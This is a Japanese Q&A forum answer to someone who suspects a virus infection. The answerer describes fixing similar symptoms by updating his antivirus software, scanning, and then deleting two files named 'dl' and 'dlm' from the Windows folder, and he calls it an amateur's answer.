• ベストアンサー

ウィルスに感染したようなんですが・・・

haruaki323の回答

回答No.2

僕の感染したウイルスと同様の症状ですね。 僕の場合、入れてあるウイルスソフトを更新することで解決しました。一度試されてはいかがですか? マイコンピュータからCドライブを選んでその中のWINDOWSフォルダをクリックしてその中にあるdlとdlmってファイルがあるんですが、そのファイルが元凶になってると僕は勝手に予測したんですが、更新前はどうやってもそのファイルを削除できませんでしたが更新してウイルススキャンしてその後そのファイルを削除したら成功しました。更新できる期間内でしたらもしかしたらそちらの場合も解決できるかもしれません。素人回答ですいません…。